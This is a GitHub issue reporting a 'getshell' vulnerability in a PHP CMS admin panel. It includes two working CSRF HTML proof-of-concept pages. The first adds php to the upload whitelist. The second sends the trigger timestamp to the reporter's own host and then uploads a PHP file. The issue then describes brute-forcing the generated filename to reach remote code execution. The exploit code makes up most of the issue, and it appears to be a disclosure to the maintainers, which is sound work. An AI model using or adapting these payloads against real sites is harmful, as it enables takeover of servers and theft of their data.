Skip to content

Can getshell vulnerability #7

Description

@PickledFish

Getshell through three steps

  1. Open the following code file when the administrator is logged in.
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
<script type="text/javascript">
    function post(url, fields) {
        var p = document.createElement("form");
        p.action = url;
        p.innerHTML = fields;
        p.target = "_self";
        p.method = "post";
        document.body.appendChild(p);
        p.submit();
    }

    function csrf_hack() {
        var fields;

        fields += "<input type='hidden' name='image[upload_max_filesize]' value='10240' />";
        fields += "<input type='hidden' name='image[extensions]' value='=jpg,jpeg,png,gif,bmp4,php' />";
        fields += "<input type='hidden' name='video[upload_max_filesize]' value='10240' />";
        fields += "<input type='hidden' name='audio[upload_max_filesize%5' value='10240' />";
        fields += "<input type='hidden' name='file[upload_max_filesize]' value='10240' />";
        fields += "<input type='hidden' name='video[extensions]' value='mp4,avi,wmv,rm,rmvb,mkv' />";
        fields += "<input type='hidden' name='audio[extensions]' value='mp3,wma,wav' />";
        fields += "<input type='hidden' name='file[extensions]' value='txt,pdf,doc,docx,xls,xlsx,ppt,pptx,zip,rar' />";


        var url = "http://192.168.1.2/index.php?g=admin&m=setting&a=upload_post";
        post(url, fields);
    }

    window.onload = function () {
        csrf_hack();
    }
</script>
</body>
</html>

The above script can use the csrf to add a file with the suffix php in the whitelist of the uploaded image.

  1. Next, let the logged in administrator execute the following code script, which will upload a php script to /data/upload/admin/[date]/[filename].php, where the date is the file upload date, which is the script trigger date. The file name is php function uniqid() to execute the build.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
    function submitRequest() {
        var xhr1 = new XMLHttpRequest();
        xhr1.open('GET', "http://127.0.0.1:5000/?timestamp=" + (new Date()).valueOf(), true);
        xhr1.send(null);
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.1.2\/index.php?g=asset&m=asset&a=plupload", true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------128712298613561");
        xhr.withCredentials = true;
        var body = "-----------------------------128712298613561\r\n" +
            "Content-Disposition: form-data; name=\"name\"\r\n" +
            "\r\n" +
            "abc.php\r\n" +
            "-----------------------------128712298613561\r\n" +
            "Content-Disposition: form-data; name=\"app\"\r\n" +
            "\r\n" +
            "Admin\r\n" +
            "-----------------------------128712298613561\r\n" +
            "Content-Disposition: form-data; name=\"file\"; filename=\"abc.php\"\r\n" +
            "Content-Type: application/octet-stream\r\n" +
            "\r\n" +
            "\x3c?php phpinfo();?\x3e\r\n" +
            "-----------------------------128712298613561--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
            aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    }

    window.onload = submitRequest();
</script>
</body>
</html>

In the above script, before uploading the php file, the script trigger timestamp will be sent to my host, let me know the script trigger time (prepare for the subsequent blast file name), followed by uploading a file, the content is obtained. Phpinfo();

  1. The script has been uploaded, and I got the timestamp when I uploaded the script, we will find it now.
    上传脚本时获取的时间戳

code

After two hours of attack, I received the following good news.
爆破出上传路径

Remote execution of the command succeeded
a

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions